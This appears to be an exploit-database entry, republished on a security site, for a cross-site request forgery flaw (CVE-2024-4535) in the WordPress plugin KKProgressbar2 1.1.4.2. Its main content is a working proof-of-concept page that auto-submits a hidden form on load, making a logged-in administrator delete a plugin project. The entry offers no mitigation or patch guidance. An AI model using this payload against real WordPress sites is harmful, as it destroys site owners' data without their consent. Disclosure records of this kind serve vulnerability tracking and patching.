WordPress KKProgressbar2 1.1.4.2 Cross Site Request Forgery

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 150

# Exploit Title: WordPress Plugin KKProgressbar2 - Cross-Site Request
Forgery (CSRF)
# # Exploit Title: WordPress Plugin KKProgressbar2 - Cross-Site Request
Forgery (CSRF)
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: This email address is being protected from spambots. You need JavaScript enabled to view it.
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2024-4535

POC:

<body onload="document.forms[0].submit()">
<form action="http:// target.com/wp-admin/admin.php?page=kkpb-menu"
method="post">
<input type="hidden" name="action" value="delete-project">
<input type="hidden" name="id" value="<<ID>>">
</form>
</body>

Social Media Share

Latest Tech

Latest Posts

WordPress KKProgressbar2 1.1.4.2 Cross Site Request Forgery

Information Security